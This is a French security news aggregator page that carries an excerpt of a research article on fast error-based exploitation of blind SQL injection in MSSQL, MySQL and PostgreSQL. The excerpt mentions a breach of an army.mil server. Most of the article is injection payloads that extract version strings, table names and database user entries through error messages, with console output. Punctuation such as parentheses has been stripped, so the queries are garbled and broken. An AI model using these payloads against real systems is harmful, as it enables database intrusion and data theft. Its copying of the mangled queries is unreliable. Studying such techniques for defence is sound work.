|
|
|
Methods of Quick Exploitation of Blind SQL Injection |
Si vous voulez bloquer ce service sur vos fils RSS
Si vous voulez nous contacter ou nous proposer un fil RSS
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Présentation : A couple of days ago TinKode attracted everybody s attention by breaking a web site in the domain army.mil. The server onestop.army.mil was attacked and the investigator found a Blind SQL Injection vulnerability on it. A logically true query A logically false query This time, I was most interested not in the fact of server compromise, but in the applied technique of exploitation of Blind SQL Injection vulnerability at DBMS MSSQL 2000 Thus, if casting via the function convert is unsuccessful, then MSSQL will place useful data into the error message Testing of a later version of MSSQL 2005 showed that the technique used by TinKode is applicable to it, too select convert int, version select convert int, select table_name from select row_number over order by table_name as rownum,table_name from information_schema.tables as t where t.rownum 1 select convert int, select table_name from select row_number over order by table_name as rownum,table_name from information_schema.tables as t where t.rownum 2 ... Similar manipulations with casting were conducted for a widespread DBMS MySQL. The experiment showed that in case of unsuccessful casting, MySQL returns a non-critical notification that cannot be used to achieve the same results for Blind SQL Injection exploitation mysql select cast 'str1' as char ---------------------- cast 'str1' as char ---------------------- str1 ---------------------- 1 row in set 0.00 sec mysql select cast 'str1' as decimal ------------------------- cast 'str1' as decimal ------------------------- 0 ------------------------- 1 row in set, 1 warning 0.01 sec mysql show warnings --------- ------ ------------------------------------------- Level Code Message --------- ------ ------------------------------------------- Warning 1292 Truncated incorrect DECIMAL value 'str1' --------- ------ ------------------------------------------- 1 row in set 0.00 sec mysql select convert 'str2',char ---------------------- convert 'str2',char ---------------------- str2 ---------------------- 1 row in set 0.00 sec mysql select convert 'str2',decimal ------------------------- convert 'str2',decimal ------------------------- 0 ------------------------- 1 row in set, 1 warning 0.00 sec mysql show warnings --------- ------ ------------------------------------------- Level Code Message --------- ------ ------------------------------------------- Warning 1292 Truncated incorrect DECIMAL value 'str2' --------- ------ ------------------------------------------- 1 row in set 0.00 sec Well and good But then, the universal exploitation technique by Qwazar is applicable to all MySQL versions select count ,concat version ,floor rand 0 2 x from table group by x select count ,concat select user from mysql.user limit 0,1 ,floor rand 0 2 x from mysql.user group by x select count ,concat select user from mysql.user limit 1,1 ,floor rand 0 2 x from mysql.user group by x ... select 1 and row 1,1 select count ,concat version ,0x3a,floor rand 2 x from select 1 union select 2 a group by x limit 1 Using one such request, an attacker can obtain up to 64 bytes of useful data from the error message. This technique can be used for MySQL v3.x. Further experiments with the technique proposed by TinKode showed that this method can be applied to PostgreSQL, too select cast version as numeric select cast select table_name from information_schema.tables limit 1 offset 0 as numeric select cast select table_name from information_schema.tables limit 1 offset 1 as numeric ... Like MSSQL, PostgreSQL doesn t seriously restrict the length of the data returned within an error message. If the function pg_last_error is not called within the context of PHP, but error_reporting is still enabled, then one query allows an attacker to obtain up to 1229 bytes of useful data from the error message generated by PHP. Unfortunately, such tricks will not work with Oracle It is necessary to consider this DBMS...
Les derniers articles du site " Positive Technologies Research Lab" :
- RFI over SQL Injection Cross-Site Scripting
- Magic Quotes
- Methods of Quick Exploitation of Blind SQL Injection
- Juniper JUNOS Remote Kernel Crash Flaw
- WASC Threat Classification v2.0 is Out
- Over 32 million accounts have been compromised the result of an attack on the RockYou.com site
- HTTP Parameter Fragmentation HPF is one of the methods to bypass security filters in web applications
- non blind SQL Injection
- Password analysis for Windows Live Hotmail users
- Another fine method to exploit SQL Injection and bypass WAF
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Si vous voulez bloquer ce service sur vos fils RSS :
- avec iptables "iptables -A INPUT -s 88.191.75.173 --dport 80 -j DROP"
- avec ipfw et wipfw "ipfw add deny from 88.191.75.173 to any 80"
- Nous contacter par mail
| Mini-Tagwall des articles publiés sur SecuObs : | | | | sécurité, exploit, windows, attaque, outil, microsoft, réseau, audit, metasploit, vulnérabilité, système, virus, internet, usbsploit, données, source, linux, protocol, présentation, scanne, réseaux, scanner, bluetooth, conférence, reverse, shell, meterpreter, vista, rootkit, détection, mobile, security, malicieux, engineering, téléphone, paquet, trames, https, noyau, utilisant, intel, wishmaster, google, sysun, libre |
| Mini-Tagwall de l'annuaire video : | | | | curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio |
| Mini-Tagwall des articles de la revue de presse : | | | | security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
| Mini-Tagwall des Tweets de la revue Twitter : | | | | security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
|
|
|
|
|
